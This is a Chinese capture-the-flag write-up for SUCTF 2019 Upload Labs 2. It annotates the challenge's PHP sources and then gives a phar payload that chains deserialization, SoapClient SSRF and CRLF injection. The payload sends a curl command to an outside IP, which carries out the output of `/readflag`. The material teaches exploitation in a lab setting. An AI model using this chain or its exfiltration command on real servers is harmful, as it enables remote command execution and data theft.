65,【5】buuctf web [SUCTF 2019]Upload Labs 2

进入靶场

1,源代码

点击题目时有个就有个admin.php

<?php
// 引入配置文件
include 'config.php';class Ad{public $cmd;public $clazz;public $func1;public $func2;public $func3;public $instance;public $arg1;public $arg2;public $arg3;// 构造函数,用于初始化对象的属性function __construct($cmd, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3){// 存储命令$this->cmd = $cmd;// 存储类名$this->clazz = $clazz;// 存储第一个函数名$this->func1 = $func1;// 存储第二个函数名$this->func2 = $func2;// 存储第三个函数名$this->func3 = $func3;// 存储第一个参数$this->arg1 = $arg1;// 存储第二个参数$this->arg2 = $arg2;// 存储第三个参数$this->arg3 = $arg3;}// 检查方法,使用反射来调用类的方法function check(){// 创建一个反射类,用于实例化类$reflect = new ReflectionClass($this->clazz);// 实例化类$this->instance = $reflect->newInstanceArgs();// 创建一个反射方法,用于调用类的第一个方法$reflectionMethod = new ReflectionMethod($this->clazz, $this->func1);// 调用类的第一个方法,并传递第一个参数$reflectionMethod->invoke($this->instance, $this->arg1);// 创建一个反射方法,用于调用类的第二个方法$reflectionMethod = new ReflectionMethod($this->clazz, $this->func2);// 调用类的第二个方法,并传递第二个参数$reflectionMethod->invoke($this->instance, $this->arg2);// 创建一个反射方法,用于调用类的第三个方法$reflectionMethod = new ReflectionMethod($this->clazz, $this->func3);// 调用类的第三个方法,并传递第三个参数$reflectionMethod->invoke($this->instance, $this->arg3);}// 析构函数,在对象销毁时执行function __destruct(){// 使用 system 函数执行存储的命令system($this->cmd);}
}// 检查请求是否来自本地
if($_SERVER['REMOTE_ADDR'] == '127.0.0.1'){// 检查是否有 admin 的 POST 请求if(isset($_POST['admin'])){// 获取 POST 请求中的命令$cmd = $_POST['cmd'];// 获取 POST 请求中的类名$clazz = $_POST['clazz'];// 获取 POST 请求中的第一个函数名$func1 = $_POST['func1'];// 获取 POST 请求中的第二个函数名$func2 = $_POST['func2'];// 获取 POST 请求中的第三个函数名$func3 = $_POST['func3'];// 获取 POST 请求中的第一个参数$arg1 = $_POST['arg1'];// 获取 POST 请求中的第二个参数$arg2 = $_POST['arg2'];// 获取 POST 请求中的第三个参数$arg3 = $_POST['arg3'];// 创建一个 Ad 类的对象,并传递相应参数$admin = new Ad($cmd, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3);// 调用 check 方法$admin->check();}
}
else {// 输出非管理员信息echo "You r not admin!";
}
  • 此文件定义了 Ad类,使用了反射机制。__construct 方法接收多个参数,包括 cmdclazzfunc1func2func3arg1arg2 和 arg3,存储在对象属性中。
  • check 方法使用反射来实例化 $clazz 存储的类,并调用该类的三个函数 func1func2 和 func3,并传递相应的参数。
  • __destruct 方法使用 system 函数执行 cmd 存储的命令.
  • 有一个简单的权限检查,仅允许 127.0.0.1 地址的请求访问,通过检查 $_SERVER['REMOTE_ADDR'] ,若请求包含 admin 的 POST 请求,会根据 POST 数据创建 Ad 类对象并调用其 check 方法。
  • Ad 类的 __destruct 方法使用 system 函数执行 cmd 命令,可能导致命令执行漏洞。

源码里有

func.php

<?php
// 引入 class.php 文件
include 'class.php';// 检查是否同时设置了 submit 和 url 的 POST 请求
if (isset($_POST["submit"]) && isset($_POST["url"])) {// 使用正则表达式检查 url 的内容是否包含一些危险的协议或关键字if(preg_match('/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i',$_POST['url'])){// 如果包含危险的协议或关键字,终止程序并输出提示信息die("Go away!");}else{// 获取 POST 请求中的 url 数据$file_path = $_POST['url'];// 创建 File 类的新实例,将 url 作为参数传递给构造函数$file = new File($file_path);// 调用 File 类的 getMIME 方法$file->getMIME();// 输出文件类型信息echo "<p>Your file type is '$file' </p>";}
}
?>
  • 该文件引入 class.php 并检查 submit 和 url 的 POST 请求是否同时存在。
  • 使用正则表达式对 url 进行检查,防止一些危险的协议或关键字,若匹配则终止程序。
  • 若通过检查,会创建 File 类的对象并调用 getMIME 方法获取文件的 MIME 类型。

 class.php

<?php
// 引入 config.php 文件
include 'config.php';class File {// 存储文件名的公共属性public $file_name;// 存储文件类型的公共属性public $type;// 存储函数名的公共属性,默认为 "Check"public $func = "Check";// 构造函数,接收文件名作为参数function __construct($file_name) {$this->file_name = $file_name;}// 当对象反序列化时调用此方法function __wakeup() {// 使用反射类根据 $func 属性创建一个新的对象$class = new ReflectionClass($this->func);// 使用反射类实例化对象,并将 $file_name 作为参数传递$a = $class->newInstanceArgs([$this->file_name]);// 调用新对象的 check 方法$a->check();}// 获取文件 MIME 类型的方法function getMIME() {// 打开文件信息资源$finfo = finfo_open(FILEINFO_MIME_TYPE);// 获取文件的 MIME 类型$this->type = finfo_file($finfo, $this->file_name);// 关闭文件信息资源finfo_close($finfo);}// 当对象作为字符串使用时调用此方法function __toString() {// 返回文件的类型return $this->type;}
}class Check {// 存储文件名的公共属性public $file_name;// 构造函数,接收文件名作为参数function __construct($file_name) {$this->file_name = $file_name;}// 检查文件内容的方法function check() {// 获取文件的内容$data = file_get_contents($this->file_name);// 检查文件内容是否包含 "<?", 若包含则终止程序if (mb_strpos($data, "<?")!== FALSE) {die("&lt;? in contents!");}}
}

 

  • 此文件定义了 File 类和 Check 类。
  • File 类的 __construct 方法接收文件名并存储,__wakeup 方法使用反射创建 Check 类的对象并调用其 check 方法,对文件进行检查。
  • getMIME 方法使用 finfo 函数获取文件的 MIME 类型,__toString 方法返回文件类型。
  • Check 类的 check 方法检查文件内容是否包含 "<?",若包含则终止程序。
    • File 类的 __wakeup 方法使用反射创建对象,但没有对 func 属性进行严格的验证和过滤,使得攻击者可以控制要实例化的类,这是一个潜在的反序列化漏洞入口。

不过连<?都过滤了,还能传什么????

2,该构造payload了

参考[SUCTF 2019]Upload Labs 2 phar+Soapclient结合_suctf-2019-web-upload labs 2-CSDN博客

这篇博客最后还有出题人写的笔记 

<?php
// 创建一个 Phar 文件
$phar = new Phar('333.phar');
$phar->startBuffering();
$phar->addFromString('333.txt', 'text');
$phar->setStub('<script language="php">__HALT_COMPILER();</script>');class File {public $file_name = "";public $func = "SoapClient";function __construct() {$target = "http://127.0.0.1/admin.php";$post_string = 'admin=1&cmd=curl "http://174.0.125.63:888"."?`/readflag`"&clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3='. "\r\n";$headers = [];$this->file_name  = [null,array('location' => $target,'user_agent' => str_replace('^^', "\r\n", 'xxxxx^^Content-Type: application/x-www-form-urlencoded^^'.join('^^', $headers).'Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string),'uri' => 'hello')];}function createObject() {// 使用反射根据 $func 属性创建一个新的对象$class = new ReflectionClass($this->func);// 使用反射类实例化对象,并将 $file_name 作为参数传递$a = $class->newInstanceArgs([$this->file_name]);return $a;}
}$object = new File();
// 对序列化后的对象进行 URL 编码
echo urlencode(serialize($object));
$phar->setMetadata($object);
$phar->stopBuffering();// 以下是对创建的对象使用反射实例化的部分,为了演示将其放在同一文件中,但在实际应用中可能需要根据具体情况调整调用位置
if ($object instanceof File) {$createdObject = $object->createObject();// 这里可以根据 $createdObject 的类型和具体需求进行进一步的操作// 例如,检查是否为 SoapClient 类的实例if ($createdObject instanceof SoapClient) {echo "Successfully created SoapClient object";} else {echo "Failed to create SoapClient object";}
}

 将运行结果传上去应该就能得到flag了,不过现在手头能运行PHP的东西都出了点问题

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/893312.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

3Dgaussian-splatting部署使用流程

gaussian-splatting 教程目录&#xff1a; 官网地址&#xff1a;https://github.com/graphdeco-inria/gaussian-splatting (https://www.bilibili.com/video/BV1Nz421o71Q/?spm_id_from333.1391.0.0&vd_source79565f57ecbfc6a2349aa6f37d4ec214) 安装前置 1.安装Git&…

BLE透传方案,IoT短距无线通信的“中坚力量”

在物联网&#xff08;IoT&#xff09;短距无线通信生态系统中&#xff0c;低功耗蓝牙&#xff08;BLE&#xff09;数据透传是一种无需任何网络或基础设施即可完成双向通信的技术。其主要通过简单操作串口的方式进行无线数据传输&#xff0c;最高能满足2Mbps的数据传输速率&…

12_PlayerPrefs存储登录窗口逻辑_回调函数优化Lamd表达式

创建 登录窗口LoginWnd.cs 绑定 登录窗口LoginWnd.cs 编写 登录窗口LoginWnd.cs using UnityEngine; using UnityEngine.UI; //输入文本 命名空间 //功能 : 登录注册窗口 public class LoginWnd : MonoBehaviour{public InputField iptAcct;public InputField iptPass;public …

西门子【Library of General Functions (LGF) for SIMATIC S7-1200 / S7-1500】

文章目录 概要整体架构流程技术名词解释技术细节小结 概要 通用函数库 (LGF) 扩展了 TIA Portal 中用于 PLC 编程的 STEP 7 指令&#xff08;数学函数、时间、计数器 等&#xff09;。该库可以不受限制地使用&#xff0c;并包含 FIFO 、搜索功能、矩阵计算、 astro 计…

每日一刷——1.20——准备蓝桥杯

链接&#xff1a;登录—专业IT笔试面试备考平台_牛客网 来源&#xff1a;牛客网 题目一 请统计某个给定范围[L, R]的所有整数中&#xff0c;数字2出现的次数。 比如给定范围[2, 22]&#xff0c;数字2在数2中出现了1次&#xff0c;在数12中出现1次&#xff0c;在数20中出现1次&a…

Cursor 与常见集成开发环境(IDE)的优势对比

Cursor与常见集成开发环境&#xff08;IDE&#xff09;的优势对比 一、AI 辅助编程能力 强大的代码生成功能&#xff1a; Cursor&#xff1a; 以其内置的强大 AI 辅助编程功能为核心优势。用户可以通过输入自然语言描述&#xff0c;快速生成各种编程语言的代码。例如&#xf…

会议签到系统的架构和实现

会议签到系统的架构和实现 摘要:通过定制安卓会议机开机APP呈现签到界面&#xff0c;并且通过W/B结构采集管理签到信息&#xff0c;实现会议签到的功能。为达到此目标本文将探讨使用Redis提供后台数据支持&#xff1b;使用SocketIo处理适时消息&#xff1b;使用Flask进行原型开…

c++ 与 Matlab 程序的数据比对

文章目录 背景环境数据保存数据加载 背景 ***避免数据精度误差&#xff0c;快速对比变量 *** 环境 c下载 https://github.com/BlueBrain/HighFive 以及hdf5库 在vs 中配置库 数据保存 #include <highfive/highfive.hpp> using namespace HighFive;std::string fil…

【go语言】go的卸载与安装

一、卸载go sudo rm -rf /usr/local/go sudo apt-get remove golang sudo apt-get remove golang-go sudo apt-get autoremove wget https://dl.google.com/go/go1.19.linux-amd64.tar.gz sudo tar -xzf go1.19.linux-amd64.tar.gz -C /usr/local go env -w GOPROXY"http…

python3D圣诞树

import pygame import math from pygame.locals import *# 初始化Pygame pygame.init()# 设置屏幕尺寸和标题 width, height 800, 600 screen pygame.display.set_mode((width, height)) pygame.display.set_caption(3D 圣诞树)# 设置颜色 GREEN (34, 139, 34) BROWN (139,…

探索 SolidJS:一款高速的前端框架

在当今的前端开发领域&#xff0c;React、Vue 和 Angular 等框架已经占据了主流位置。然而&#xff0c;对于追求性能极致优化和简单易用性的开发者来说&#xff0c;一些新兴框架正逐渐引起关注&#xff0c;其中 SolidJS 就是一个令人瞩目的候选者。本文将带您深入探讨 SolidJS …

WPF 引发类型为“System.Windows.Forms.AxHost+InvalidActiveXStateException”的异常 解决办法

本章讲述&#xff1a;引发类型为“System.Windows.Forms.AxHostInvalidActiveXStateException”的异常 解决办法。 这几天在做一个WPF功能时&#xff0c;因为引用了第三方的OCX控件&#xff0c;一般来说一个对象只要实例化就行了, 但是在引用这个控件时就报引发类型为“System.…

Kotlin语言的数据库编程

Kotlin语言的数据库编程 引言 Kotlin是一种现代的编程语言&#xff0c;因其简洁、强大和安全性而受到广泛欢迎。自从Google宣布Kotlin成为Android开发的官方语言以来&#xff0c;它的使用范围不断扩大&#xff0c;尤其是在移动应用开发、服务器端开发和数据科学等领域。在本篇…

22. C语言 输入与输出详解

本章目录: 前言1. 输入输出的基础概念1.1 标准输入输出流1.2 输入输出函数 2. 格式化输出与输入2.1 使用 printf() 进行输出示例 1: 输出字符串示例 2: 输出整数示例 3: 输出浮点数 2.2 使用 scanf() 进行输入示例 4: 读取整数和字符改进方案&#xff1a;使用getchar()清理缓冲…

OSS使用签名URL上传(返回前端上传地址)- NodeJS

使用过程 使用PUT方式的签名URL上传文件的过程如下&#xff1a; 代码示例 文件拥有者生成PUT方法的签名URL const OSS require("ali-oss");// 获取签名URL const client await new OSS({accessKeyId: yourAccessKeyId,accessKeySecret: yourAccessKeySecret,buc…

使用 div 自定义 input 和 textarea

1. 为什么要自定义呢&#xff1f; 原生的 input 和 textarea 在某些特定场景下存在功能或兼容性限制&#xff0c;因此使用 div 元素自定义实现&#xff0c;突破原生输入框在样式、功能、兼容性上的限制。 1、解决火狐浏览器换行问题 某些版本的火狐浏览器中&#xff0c;原生…

Golang的网络编程安全

Golang的网络编程安全 一、Golang网络编程的基本概念 作为一种现代化的编程语言&#xff0c;具有优秀的并发特性和网络编程能力。在Golang中&#xff0c;网络编程是非常常见的需求&#xff0c;可以用于开发各种类型的网络应用&#xff0c;比如Web服务、API服务、消息队列等。Go…

springboot集成websocket实现实时大量数据,效率性能高

前言 小编我将用CSDN记录软件开发求学之路上亲身所得与所学的心得与知识&#xff0c;有兴趣的小伙伴可以关注一下&#xff01; 也许一个人独行&#xff0c;可以走的很快&#xff0c;但是一群人结伴而行&#xff0c;才能走的更远&#xff01;让我们在成长的道路上互相学习&…

如何使用usememo和usecallback进行性能优化,什么时候使用usecallback,什么时候使用usememo

React useMemo 和 useCallback 性能优化总结以及使用场景 基本概念 useMemo 用于缓存计算结果&#xff0c;避免在每次渲染时重复进行昂贵的计算。 useCallback 用于缓存函数引用&#xff0c;避免在每次渲染时创建新的函数引用。 使用时机对比 useMemo 适用场景 复杂计算…

Python新春烟花

目录 系列文章 写在前面 技术需求 完整代码 下载代码 代码分析 1. 程序初始化与显示设置 2. 烟花类 (Firework) 3. 粒子类 (Particle) 4. 痕迹类 (Trail) 5. 烟花更新与显示 6. 主函数 (fire) 7. 游戏循环 8. 总结 注意事项 写在后面 系列文章 序号直达链接爱…